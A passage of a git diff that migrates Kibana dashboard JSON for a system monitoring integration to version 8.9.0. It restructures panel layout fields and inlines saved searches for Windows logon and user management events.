"dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", - "title": "User Event Actions - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "44697eb7-bb8e-4994-9e1b-95599f1b994a", "embeddableConfig": { "attributes": { "references": [ 
@@ -2637,21 +2739,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "44697eb7-bb8e-4994-9e1b-95599f1b994a", - "w": 18, - "x": 30, - "y": 8 - }, - "panelIndex": "44697eb7-bb8e-4994-9e1b-95599f1b994a", - "title": "Target Users [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Target Users [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 25, + "i": "29f54335-78db-4c49-a3e0-a641fd0099f6", + "w": 48, + "x": 0, + "y": 24 + }, + "panelIndex": "29f54335-78db-4c49-a3e0-a641fd0099f6", "embeddableConfig": { "attributes": { "references": [ @@ -2924,21 +3027,22 @@ "visualizationType": "lnsHeatmap" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Management Events - Affected Users vs Actions - Heatmap [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 25, - "i": "29f54335-78db-4c49-a3e0-a641fd0099f6", - "w": 48, + "h": 7, + "i": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", + "w": 9, "x": 0, - "y": 24 + "y": 49 }, - "panelIndex": "29f54335-78db-4c49-a3e0-a641fd0099f6", - "title": "User Management Events - Affected Users vs Actions - Heatmap [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", "embeddableConfig": { "attributes": { "references": [], 
@@ -3048,21 +3152,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", + "i": "39724444-251e-480d-b5f2-642362f8929e", "w": 9, - "x": 0, + "x": 9, "y": 49 }, - "panelIndex": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "39724444-251e-480d-b5f2-642362f8929e", "embeddableConfig": { "attributes": { "references": [], @@ -3172,21 +3277,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "39724444-251e-480d-b5f2-642362f8929e", + "i": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", "w": 9, - "x": 9, + "x": 18, "y": 49 }, - "panelIndex": "39724444-251e-480d-b5f2-642362f8929e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", "embeddableConfig": { "attributes": { "references": [], @@ -3296,21 +3402,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 7, - "i": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", - "w": 9, - "x": 18, + "h": 23, + "i": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", + "w": 21, + "x": 27, "y": 49 }, - "panelIndex": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", "embeddableConfig": { "attributes": { "references": [ 
@@ -3563,21 +3670,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 23, - "i": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", - "w": 21, - "x": 27, - "y": 49 - }, - "panelIndex": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa", - "title": "Event Distribution in time [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Event Distribution in time [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", + "w": 9, + "x": 0, + "y": 72 + }, + "panelIndex": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", "embeddableConfig": { "attributes": { "references": [], @@ -3687,21 +3795,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", + "i": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", "w": 9, - "x": 0, + "x": 9, "y": 72 }, - "panelIndex": "bd1b0e6a-ed99-423d-8a51-29456ec74e0e", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", "embeddableConfig": { "attributes": { "references": [], @@ -3811,21 +3920,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", + "i": "9c593d0d-c730-4277-ae74-ac3134055800", "w": 9, - "x": 9, + "x": 18, "y": 72 }, - "panelIndex": "16030d60-0638-4c98-8bc5-0d8c4bf43a0c", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9c593d0d-c730-4277-ae74-ac3134055800", "embeddableConfig": { "attributes": { "references": [], 
@@ -3935,21 +4045,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "9c593d0d-c730-4277-ae74-ac3134055800", + "i": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", "w": 9, - "x": 18, - "y": 72 + "x": 0, + "y": 95 }, - "panelIndex": "9c593d0d-c730-4277-ae74-ac3134055800", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", "embeddableConfig": { "attributes": { "references": [], @@ -4059,21 +4170,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", + "i": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", "w": 9, - "x": 0, + "x": 9, "y": 95 }, - "panelIndex": "0f1cf1e8-0798-464b-b18a-0dd1ae19d36f", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", "embeddableConfig": { "attributes": { "references": [], @@ -4183,21 +4295,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", + "i": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", "w": 9, - "x": 9, + "x": 18, "y": 95 }, - "panelIndex": "ca7947ea-7c33-4ef7-acfb-51df31226ea0", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", "embeddableConfig": { "attributes": { "references": [], 
@@ -4307,31 +4420,16 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 7, - "i": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", - "w": 9, - "x": 18, - "y": 95 - }, - "panelIndex": "38e91c86-1d3e-4342-b8cc-e95031dbf1b7", - "title": "", - "type": "lens", - "version": "8.7.0" + "title": "" } ], "timeRestore": false, "title": "[System Windows Security] User Management Events", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-71f720f0-ff18-11e9-8405-516218e3d268", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -4423,16 +4521,6 @@ "name": "20:84460bff-f94b-4d8b-a166-5ab188df891c", "type": "index-pattern" }, - { - "id": "system-7e178c80-fee1-11e9-8405-516218e3d268", - "name": "22:panel_22", - "type": "search" - }, - { - "id": "system-324686c0-fefb-11e9-8405-516218e3d268", - "name": "23:panel_23", - "type": "search" - }, { "id": "logs-*", "name": "33:indexpattern-datasource-layer-c613d393-dc99-42e4-a4f0-afb124b56634", @@ -4487,7 +4575,29 @@ "id": "logs-*", "name": "1ec8b993-9ac1-4c7f-b7f7-5136f2e310aa:9863d407-89f7-419e-ac97-2dd548e76e0b", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "22:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "22:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "23:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "23:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file 
diff --git a/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json b/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json index f8a9a47641d..258fe96fedb 100644 --- a/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json +++ b/packages/system/kibana/dashboard/system-79ffd6e0-faa0-11e6-947f-177f697178b8.json @@ -1,4 +1,15 @@ { + "id": "system-79ffd6e0-faa0-11e6-947f-177f697178b8", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNiwxXQ==", "attributes": { "description": "Overview of host metrics", "kibanaSavedObjectMeta": { @@ -4911,10 +4922,6 @@ "title": "[Metrics System] Host overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-06T15:07:11.967Z", - "id": "system-79ffd6e0-faa0-11e6-947f-177f697178b8", - "managed": false, "references": [ { "id": "metrics-*", @@ -5097,6 +5104,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json b/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json index f2703cb7c7a..bae46daa915 100644 --- a/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json +++ b/packages/system/kibana/dashboard/system-Logs-syslog-dashboard.json @@ -1,4 +1,15 @@ { + "id": "system-Logs-syslog-dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNywxXQ==", "attributes": { "description": "Syslog dashboard from the Logs System integration", "kibanaSavedObjectMeta": { 
@@ -522,10 +533,6 @@ "title": "[Logs System] Syslog dashboard", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T18:39:32.591Z", - "id": "system-Logs-syslog-dashboard", - "managed": false, "references": [ { "id": "logs-*", @@ -558,6 +565,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Metrics-system-overview.json b/packages/system/kibana/dashboard/system-Metrics-system-overview.json index 192c1889f45..07b5302c89f 100644 --- a/packages/system/kibana/dashboard/system-Metrics-system-overview.json +++ b/packages/system/kibana/dashboard/system-Metrics-system-overview.json @@ -1,4 +1,15 @@ { + "id": "system-Metrics-system-overview", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyOCwxXQ==", "attributes": { "description": "Overview of system metrics", "kibanaSavedObjectMeta": { @@ -1865,10 +1876,6 @@ "title": "[Metrics System] Overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-06T12:48:08.579Z", - "id": "system-Metrics-system-overview", - "managed": false, "references": [ { "id": "metrics-*", @@ -1946,6 +1953,7 @@ "type": "dashboard" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-Windows-Dashboard.json b/packages/system/kibana/dashboard/system-Windows-Dashboard.json index b9772f6f927..7a900127d04 100644 --- a/packages/system/kibana/dashboard/system-Windows-Dashboard.json +++ b/packages/system/kibana/dashboard/system-Windows-Dashboard.json 
@@ -1,4 +1,15 @@ { + "id": "system-Windows-Dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyOSwxXQ==", "attributes": { "description": "Overview of all Windows Event Logs.", "kibanaSavedObjectMeta": { @@ -108,6 +119,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "a631db29-cb48-4bfb-b9c9-77ea2baff486", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "a631db29-cb48-4bfb-b9c9-77ea2baff486", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -130,21 +151,22 @@ "title": "User Logon Dashboard [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 5, - "i": "a631db29-cb48-4bfb-b9c9-77ea2baff486", + "h": 20, + "i": "f1073adc-88c7-4213-947d-72d05705e81a", "w": 12, "x": 0, - "y": 0 + "y": 5 }, - "panelIndex": "a631db29-cb48-4bfb-b9c9-77ea2baff486", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "f1073adc-88c7-4213-947d-72d05705e81a", "embeddableConfig": { "attributes": { "references": [ 
@@ -202,21 +224,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 20, - "i": "f1073adc-88c7-4213-947d-72d05705e81a", - "w": 12, - "x": 0, - "y": 5 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "f1073adc-88c7-4213-947d-72d05705e81a", - "title": "Number of Events [Windows Overview]", - "type": "lens", - "version": "8.7.0" + "title": "Number of Events [Windows Overview]" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -239,21 +262,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 5, - "i": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", + "h": 20, + "i": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", "w": 36, "x": 12, - "y": 0 + "y": 5 }, - "panelIndex": "dadfa90b-35df-4cdb-8b7f-80b75ef8cb9b", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", "embeddableConfig": { "attributes": { "references": [ 
@@ -411,21 +435,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Number of Events Over Time By Channel [Windows Overview]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", - "w": 36, - "x": 12, - "y": 5 + "i": "49364a81-aad0-4123-9b41-e29cc0d20211", + "w": 16, + "x": 0, + "y": 25 }, - "panelIndex": "57c36a54-2c5c-4ca5-ae9a-b2a9b71423cc", - "title": "Number of Events Over Time By Channel [Windows Overview]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "49364a81-aad0-4123-9b41-e29cc0d20211", "embeddableConfig": { "attributes": { "references": [ @@ -531,20 +556,21 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "49364a81-aad0-4123-9b41-e29cc0d20211", + "i": "24dc70bf-961d-43d5-bbaf-b596523308d8", "w": 16, - "x": 0, + "x": 16, "y": 25 }, - "panelIndex": "49364a81-aad0-4123-9b41-e29cc0d20211", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "24dc70bf-961d-43d5-bbaf-b596523308d8", "embeddableConfig": { "attributes": { "references": [ @@ -643,20 +669,21 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 20, - "i": "24dc70bf-961d-43d5-bbaf-b596523308d8", + "i": "8f939618-5923-43d4-9b23-57f7d21b4908", "w": 16, - "x": 16, + "x": 32, "y": 25 }, - "panelIndex": "24dc70bf-961d-43d5-bbaf-b596523308d8", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "8f939618-5923-43d4-9b23-57f7d21b4908", "embeddableConfig": { "attributes": { "references": [ 
@@ -755,30 +782,15 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, - "gridData": { - "h": 20, - "i": "8f939618-5923-43d4-9b23-57f7d21b4908", - "w": 16, - "x": 32, - "y": 25 - }, - "panelIndex": "8f939618-5923-43d4-9b23-57f7d21b4908", - "type": "lens", - "version": "8.7.0" + "enhancements": {}, + "type": "lens" + } } ], "timeRestore": false, "title": "[System] Windows Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-05-04T21:59:59.346Z", - "id": "system-Windows-Dashboard", - "migrationVersion": { - "dashboard": "8.7.0" - }, "references": [ { "id": "logs-*", @@ -811,5 +823,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json b/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json index 8cd88e122fb..040bc8157e1 100644 --- a/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json +++ b/packages/system/kibana/dashboard/system-bae11b00-9bfc-11ea-87e4-49f31ec44891.json @@ -1,4 +1,15 @@ { + "id": "system-bae11b00-9bfc-11ea-87e4-49f31ec44891", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEzMCwxXQ==", "attributes": { "description": "User logon activity dashboard.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 28, + "i": "1", + "w": 18, + "x": 0, + "y": 34 + }, + "panelIndex": "1", "embeddableConfig": { "attributes": { "references": [ 
@@ -294,20 +315,21 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} - }, + "enhancements": {}, + "type": "lens" + } + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 28, - "i": "1", + "h": 18, + "i": "3", "w": 18, "x": 0, - "y": 34 + "y": 16 }, - "panelIndex": "1", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "3", "embeddableConfig": { "attributes": { "references": [ @@ -444,21 +466,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Administrator Users [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "visualization", "gridData": { - "h": 18, - "i": "3", - "w": 18, + "h": 6, + "i": "4", + "w": 12, "x": 0, - "y": 16 + "y": 0 }, - "panelIndex": "3", - "title": "Administrator Users [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "4", "embeddableConfig": { "enhancements": {}, "savedVis": { 
@@ -481,23 +504,48 @@ "title": "User Logon Dashboard [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 6, - "i": "4", - "w": 12, - "x": 0, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "4", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "winlog.logon.type", + "source.domain", + "source.ip", + "winlog.logon.id" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":{\"query\":\"4624\"},\"type\":\"phrase\"},\"query\":{\"match\":{\"event.code\":{\"query\":\"4624\",\"type\":\"phrase\"}}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User Logons [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, 
@@ -507,12 +555,21 @@ "y": 62 }, "panelIndex": "10", - "panelRefName": "panel_10", "title": "Logon Details", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 6, + "i": "34fc9633-8a7c-444d-8d19-06095b55fb43", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "34fc9633-8a7c-444d-8d19-06095b55fb43", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -535,21 +592,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 6, - "i": "34fc9633-8a7c-444d-8d19-06095b55fb43", - "w": 36, - "x": 12, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "34fc9633-8a7c-444d-8d19-06095b55fb43", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 10, + "i": "f2925b5d-a820-428f-83dc-a547186bcbe6", + "w": 9, + "x": 0, + "y": 6 + }, + "panelIndex": "f2925b5d-a820-428f-83dc-a547186bcbe6", "embeddableConfig": { "attributes": { "references": [], @@ -623,21 +681,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 10, - "i": "f2925b5d-a820-428f-83dc-a547186bcbe6", + "i": "b6b45344-9881-4adf-ae69-4b892d976e63", "w": 9, - "x": 0, + "x": 9, "y": 6 }, - "panelIndex": "f2925b5d-a820-428f-83dc-a547186bcbe6", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "b6b45344-9881-4adf-ae69-4b892d976e63", "embeddableConfig": { "attributes": { "references": [], 
@@ -711,21 +770,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 10, - "i": "b6b45344-9881-4adf-ae69-4b892d976e63", - "w": 9, - "x": 9, + "h": 13, + "i": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", + "w": 30, + "x": 18, "y": 6 }, - "panelIndex": "b6b45344-9881-4adf-ae69-4b892d976e63", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", "embeddableConfig": { "attributes": { "references": [], @@ -889,21 +949,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Logon Events Timeline" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 13, - "i": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", - "w": 30, + "h": 15, + "i": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", + "w": 15, "x": 18, - "y": 6 + "y": 19 }, - "panelIndex": "e6bde0c0-6365-4c2a-b6d1-232e936d592e", - "title": "Logon Events Timeline", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", "embeddableConfig": { "attributes": { "references": [ @@ -1037,21 +1098,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Logon Types [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", + "i": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", "w": 15, - "x": 18, + "x": 33, "y": 19 }, - "panelIndex": "cf50b48e-453c-46fb-ad35-7ccfb7b03de0", - "title": "Logon Types [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", "embeddableConfig": { "attributes": { "references": [ 
@@ -1218,23 +1280,48 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", - "w": 15, - "x": 33, - "y": 19 + "hidePanelTitles": false, + "type": "lens" }, - "panelIndex": "2ccb4f49-c9ee-48a0-b602-f86fa0e21504", - "title": "Logon Sources [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Logon Sources [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "event.action" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4778\",\"4779\"],\"type\":\"phrases\",\"value\":\"4778, 4779\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4778\"}},{\"match_phrase\":{\"event.code\":\"4779\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Remote Interactive Connections and Disconnections [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 28, 
